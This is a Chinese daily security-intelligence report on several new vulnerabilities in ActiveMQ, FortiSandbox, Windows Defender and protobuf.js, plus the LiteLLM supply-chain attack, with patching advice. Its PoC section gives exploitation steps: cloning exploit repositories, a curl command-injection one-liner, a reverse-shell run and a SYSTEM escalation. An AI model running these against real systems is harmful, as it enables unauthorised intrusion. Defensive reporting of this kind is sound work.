当前位置：首页 > article >正文

每日安全情报报告 · 2026-04-19

article 2026/4/19 10:59:18

每日安全情报报告 · 2026-04-19发布时间2026-04-19 |风险等级高危 |情报来源The Hacker News、FreeBuf、安全客、CISA KEV、NVD、GitHub一、高危漏洞速报 CVE-2026-34197 — Apache ActiveMQ Jolokia 远程代码执行在野利用 ⚠️字段详情漏洞类型远程代码执行RCE/ 代码注入受影响组件Apache ActiveMQ Classic 5.19.46.0.0 ~ 6.2.3CVSS 评分8.8高危利用状态在野积极利用已入 CISA KEV2026-04-18 新增披露日期2026-04-07漏洞描述ActiveMQ 通过 Jolokia JMX-HTTP 桥接暴露了 Broker MBean 上的exec操作攻击者可利用此接口远程调用任意 Java 方法执行系统命令。该漏洞潜伏时间长达13 年影响大量未升级的企业消息队列基础设施。部分版本配置下甚至无需认证。CISA 于 2026-04-18 将其正式收录 KEV 目录要求联邦机构在截止日期前完成修补。参考链接- NVD 漏洞详情- CISA KEV 目录- The Hacker News 报道- FreeBuf 分析- 阿里云漏洞库修复建议立即升级至 Apache ActiveMQ Classic5.19.4或6.2.4对 Jolokia 端点实施访问控制禁止外网直接访问。 CVE-2026-39808 — Fortinet FortiSandbox 未授权命令注入 RCEPoC 已公开字段详情漏洞类型OS 命令注入未经身份验证受影响组件Fortinet FortiSandbox 4.4.0 ~ 4.4.8CVSS 评分9.1严重利用状态PoC 已公开发布GitHub攻击尝试激增披露日期2026-04-15漏洞描述FortiSandbox/fortisandbox/job-detail/tracer-behavior端点未对jidGET 参数进行充分过滤攻击者可通过管道符|注入任意 OS 命令以 root 权限执行无需任何认证凭据。PoC 代码已由安全研究员 Samuel de Lucas 公开至 GitHub利用难度极低一条curl命令即可完成攻击。参考链接- GitHub PoCsamu-delucas/CVE-2026-39808- Cyber Press 分析报告- 新加坡 CSA 安全公告- 比利时 CCB 公告修复建议立即升级至 FortiSandbox4.4.8 以上修复版本监控/fortisandbox/job-detail/tracer-behavior端点的异常 GET 请求限制管理接口的外网访问。 CVE-2026-39813 — Fortinet FortiSandbox 未授权认证绕过字段详情漏洞类型认证绕过受影响组件Fortinet FortiSandbox 4.4.0 ~ 4.4.8CVSS 评分9.8严重利用状态漏洞已公开存在主动利用风险披露日期2026-04-15漏洞描述攻击者可通过向 FortiSandbox JRPC API 发送精心构造的 HTTP 请求绕过身份认证机制完全接管受影响设备。与 CVE-2026-39808 组合利用可实现完整的未授权 RCE 攻击链危险性极高。参考链接- OpenCVE 漏洞详情 CVE-2026-39813- 新加坡 CSA 安全公告- Undercode Testing 技术分析 CVE-2026-33825 — Windows Defender BlueHammer 本地权限提升在野利用 ⚠️字段详情漏洞类型本地权限提升LPETOCTOU 竞争条件受影响组件Microsoft Defender AntivirusWindows 10/11/Server 2016-2025CVSS 评分7.8高危利用状态在野利用确认CISA KEV 收录已修复4月Patch Tuesday披露日期2026-04-15漏洞描述Defender 威胁修复引擎在处理检测到的恶意文件时存在 TOCTOU检查-使用时间差竞争条件漏洞。攻击者可通过 NTFS 连接点重定向写入路径诱使 Defender 以 SYSTEM 权限覆盖任意系统文件从而实现本地权限提升。与RedSun云文件回滚路径验证绕过及UnDefendDefender 更新机制破坏组合利用可形成完整的防御瓦解提权攻击链。RedSun 和 UnDefend 目前仍未修复。参考链接- Picus Security 技术分析- The Hacker News 报道- FreeBuf泄露的 Windows Defender 0Day 正遭活跃利用- SOCRadar 分析修复建议立即应用微软 4 月 Patch Tuesday 安全更新已修复 BlueHammer/CVE-2026-33825RedSun 和 UnDefend 暂无补丁建议临时限制低权限用户对 Defender 功能的访问部署 EDR 行为监控。 protobuf.js — 缓冲区溢出 RCEPoC 已公开暂无官方补丁字段详情漏洞类型缓冲区溢出 / 远程代码执行受影响组件Google protobuf.js 6.8.0 ~ 7.2.6CVSS 评分严重具体评分待 CVE 正式分配利用状态PoC 已公开官方补丁暂未发布披露日期2026-04-18漏洞描述攻击者通过构造恶意 Protocol Buffer 消息利用protobuf.js解析过程中的输入验证缺陷触发缓冲区溢出可执行任意 JavaScript 代码无需身份认证。任何接受并处理 Protocol Buffer 消息的应用端点REST API、WebSocket 等均面临威胁影响 Node.js 和浏览器端大量应用。参考链接- Anavem 漏洞分析报告- npm protobufjs 官方包修复建议暂无官方补丁建议临时对处理 Protobuf 消息的接口实施严格输入验证和大小限制使用npm audit确认依赖版本关注官方 GitHub 补丁发布动态。二、漏洞 PoC 速递1. CVE-2026-34197 — Apache ActiveMQ Jolokia RCE漏洞简述利用 Jolokia JMX 接口暴露的exec操作执行任意系统命令。使用步骤# Step 1克隆 PoC 仓库 git clone https://github.com/dinosn/CVE-2026-34197.git cd CVE-2026-34197 # Step 2安装依赖 pip install requests # Step 3运行 PoC需要目标 ActiveMQ 的 Jolokia 端点可访问 # 默认端口 8161Web Console或 8080Jolokia HTTP Bridge python3 exploit.py -t http://TARGET_IP:8161 -c id # Step 4验证结果成功则返回 uid0(root) 等信息注意需要目标 ActiveMQ 启用了 Jolokia 接口默认配置中已启用部分旧版本无需认证即可利用。PoC 来源- GitHub - dinosn/CVE-2026-34197- Vulhub 环境复现2. CVE-2026-39808 — Fortinet FortiSandbox 未授权命令注入漏洞简述通过jid参数管道符注入以 root 身份执行任意 OS 命令。使用步骤# Step 1克隆 PoC 仓库 git clone https://github.com/samu-delucas/CVE-2026-39808.git cd CVE-2026-39808 # Step 2安装依赖仅需 curl 或 Python requests pip install requests # Step 3手动验证无需运行脚本单条 curl 即可 # 将命令输出写入 Web 根目录 curl http://TARGET_IP/fortisandbox/job-detail/tracer-behavior?jid1|id/var/www/html/output.txt # Step 4读取命令执行结果 curl http://TARGET_IP/output.txt # 预期输出uid0(root) gid0(root) groups0(root) # Step 5运行完整 PoC 脚本获取反弹 Shell python3 exploit.py --target http://TARGET_IP --lhost YOUR_IP --lport 4444PoC 来源- GitHub - samu-delucas/CVE-2026-398083. CVE-2026-33825 (BlueHammer) — Windows Defender TOCTOU 提权漏洞简述利用 Defender 文件修复引擎的 TOCTOU 竞争条件通过 NTFS 连接点将 SYSTEM 写操作重定向至任意文件路径。使用步骤# PoC 仓库公开 git clone https://github.com/Nightmare-Eclipse/RedSun.git cd RedSun # Step 1编译 PoC需要 Visual Studio / MinGW # Windows PowerShell 环境执行 msbuild BlueHammer.sln /p:ConfigurationRelease # Step 2运行提权 PoC需要低权限用户执行 .\BlueHammer.exe # Step 3验证权限提升 whoami # 预期输出nt authority\system注意此利用需要本地代码执行权限主要用于从受限用户账户提升至 SYSTEM。PoC 来源- BlackSwan 威胁公告- BleepingComputer 验证报道三、网络安全最新动态1. 微软 Defender 三重零日BlueHammer、RedSun、UnDefend 联合在野利用Huntress 安全团队 2026-04-18 发布紧急预警披露三个针对 Windows Defender 的零日漏洞自 4 月 10 日起已被攻击者积极利用。其中CVE-2026-33825BlueHammer已通过 4 月 Patch Tuesday 修复但RedSun和UnDefend仍处于未修复状态数亿 Windows 系统面临持续风险。三个漏洞可组合形成削弱防御持久提权的完整攻击链在渗透测试中已获 SYSTEM 权限验证。阅读 The Hacker News 报道 | 阅读 FreeBuf 分析2. Apache ActiveMQ 13 年老漏洞 CVE-2026-34197 加入 CISA KEV在野攻击激增CISA 于 2026-04-18 将 CVE-2026-34197 正式纳入已知利用漏洞KEV目录。该漏洞源于 ActiveMQ Jolokia JMX 接口设计缺陷潜伏 13 年后终于被大规模利用。目前 GitHub 已有公开 PoC攻击者正针对暴露在公网的 ActiveMQ 实例发动攻击。企业应立即排查并升级受影响版本。阅读 The Hacker News 报道 | 查看 CISA KEV 详情 | Aviatrix 技术分析3. FortiSandbox 双重严重漏洞 PoC 公开攻击态势骤然升级Fortinet 于 2026-04-15 发布安全公告披露 FortiSandbox 两个严重级别漏洞CVE-2026-39808 CVSS 9.1 CVE-2026-39813 CVSS 9.8。公告发布后仅 2 天CVE-2026-39808 的 PoC 即被公开至 GitHub漏洞利用门槛极低。新加坡 CSA、比利时 CCB 等多国安全机构已相继发布紧急预警要求使用 FortiSandbox 的组织立即升级。阅读 vpncentral 分析 | 查看 GitHub PoC4. protobuf.js 零日 RCEPoC 公开、官方补丁悬空Node.js 生态拉响警报2026-04-18Google 广泛使用的 JavaScript Protocol Buffers 库protobuf.js版本 6.8.0 ~ 7.2.6被曝严重 RCE 漏洞PoC 已公开。官方截至报告发布时尚未发布补丁数以万计的 Node.js 应用面临无补丁窗口期风险。建议所有使用protobuf.js的项目立即进行依赖自查并实施临时缓解措施。阅读 Anavem 漏洞报告5. LiteLLM 供应链投毒腾讯朱雀实验室完整溯源TeamPCP 窃取 PyPI 发布权限腾讯朱雀实验室发布完整溯源报告揭示 3 月 LiteLLM 供应链攻击版本 1.82.7 和 1.82.8的完整攻击链攻击组织TeamPCP先通过 Trivy 扫描器窃取 PyPI 发布凭证随后将恶意代码嵌入.pth文件Python 启动时自动执行实现对 SSH 密钥、云端凭证及所有 LLM API Key 的静默窃取。LiteLLM 月下载量近 1 亿次此次攻击被认为是 2026 年最严重的 AI 供应链攻击事件之一。阅读腾讯云开发者报告 | GitHub 完整分析 | dev.to 技术复盘6. 执法行动Interpol-related 行动打掉 PowerOFF DDoS 平台查封 53 个域名国际执法部门联合行动成功捣毁PowerOFFDDoS 租用攻击平台查封53 个恶意域名涉及75,000 名注册用户和300 万个犯罪账户。该平台长期向黑市提供低成本 DDoS 攻击服务被多个勒索软件组织用于勒索辅助打击。此次行动是 2026 年迄今规模最大的 DDoS 生态系统打击行动。查看 2026-04-18 每日安全资讯7. 2026 年第 3 周网络安全周报AI 助力漏洞挖掘供应链继续失守本周4月13-17日主要安全态势微软 4 月补丁日创历史第二大规模163 个 CVE其中 2 个零日已在野利用供应链攻击持续泛滥LiteLLM、Axios、Apifox 等The Gentlemen 勒索软件单周发动 68 起攻击成为本周最活跃威胁组织AI 安全军备竞赛加速Claude Mythos 等模型展现出大规模漏洞挖掘能力安全行业对 AI 双刃剑风险的讨论愈发激烈。阅读 2026 年第 3 周安全周报四、本期重点摘要风险等级漏洞/事件关键点严重CVE-2026-34197 Apache ActiveMQ13年老洞、在野利用、CISA KEV 新增严重CVE-2026-39808/39813 FortiSandbox双重严重、PoC 公开、认证绕过RCE高危CVE-2026-33825 Windows DefenderBlueHammer 在野利用RedSun/UnDefend 未修复高危protobuf.js RCEPoC 公开、无官方补丁、影响 Node.js 生态中危LiteLLM 供应链攻击溯源TeamPCP 全链路披露AI 供应链信任危机信息PowerOFF DDoS 平台被打掉53 域名、7.5 万用户、300 万犯罪账户五、今日行动清单P0 优先Apache ActiveMQ立即检查版本升级至 5.19.4 / 6.2.4对 Jolokia 端点设置访问控制列表Fortinet FortiSandbox立即升级至 4.4.8 修复版本监控tracer-behavior端点访问日志Windows Defender确认 4 月 Patch Tuesday 补丁已部署BlueHammer/CVE-2026-33825关注 RedSun/UnDefend 补丁发布protobuf.js运行npm audit检查是否使用 6.8.0 ~ 7.2.6 版本对 Protobuf 输入接口实施严格校验LiteLLM确认项目未使用 1.82.7 / 1.82.8 版本检查环境变量和 SSH 密钥是否泄露本报告综合自 The Hacker News、FreeBuf、CISA KEV、NVD、GitHub、技术栈周报等权威来源仅供安全防御研究参考请勿用于非法用途。

每日安全情报报告 · 2026-04-19

相关文章：

每日安全情报报告 · 2026-04-19

Fan Control完整教程：Windows风扇控制软件免费下载与专业配置指南

如何用Python快速掌握严格耦合波分析：光学仿真的终极指南

如何解决暗黑破坏神2存档编辑的复杂性问题：d2s-editor可视化解决方案深度解析

零跑D19上市：“配置卷王”的高端破局路

PIE Engine数据管理避坑指南：从Shapefile上传到哨兵2号影像导出的完整流程

3个场景解锁抖音下载器：从零开始掌握高效素材收集

SVG路径编辑器终极指南：3分钟掌握可视化SVG路径编辑技巧

如何用5个步骤实现网站完整离线备份方案

AI建站工具选型指南：五大模式横向对比与筛选标准

Windows Cleaner：3分钟解决C盘爆红问题，让你的电脑重获新生！

暗黑3终极宏工具D3KeyHelper：如何轻松实现技能自动化连点

用python解放右手(九) 机器人告警-让Python替你喊人

SystemVerilog文件读写避坑指南：$fopen、$fscanf这些函数你真的用对了吗？

nSkinz皮肤修改器：CS:GO武器皮肤自定义的终极技术指南

eqMac：macOS系统级音频均衡器与音量混合器的终极解决方案

别再用STM32硬刚了！聊聊APM飞控那块神奇的8位单片机（ArduPilot Copter固件初探）

别再只会用cv2.warpPerspective了！用OpenCV-Python的cv2.remap()实现更灵活的图片拼接（附完整代码）

告别OpenCV！用STM32+OV7725从零搭建一个HSL颜色追踪小车（附完整源码）

如何高效获取网络资源：多平台嗅探与批量下载工具全解析

避坑指南：LabVIEW 2020 Modbus TCP通信中那些让人头疼的‘超时’与‘断线重连’问题

Windows Cleaner终极指南：如何快速释放C盘空间，告别系统卡顿烦恼

Scroll Reverser终极指南：如何为Mac触控板和鼠标分别设置滚动方向

从扫地机器人到AGV：拆解双轮差速模型在CoppeliaSim中的ROS实战配置

EdgeRemover：彻底卸载Microsoft Edge的智能PowerShell解决方案

Zotero-SciHub插件：一键获取学术文献的终极解决方案

S2-Pro Java面试题深度解析与模拟面试应用

避坑指南：PyTorch中ReflectionPad2d和ReplicationPad2d用错了？详解两者区别与适用场景

别再空谈RAG了！手把手教你用LangChain + Chroma + 本地SearXng，从零搭建一个能联网搜索的智能问答助手

零基础搞定PyTorch 2.8+RTX 4090D：开箱即用的深度学习环境配置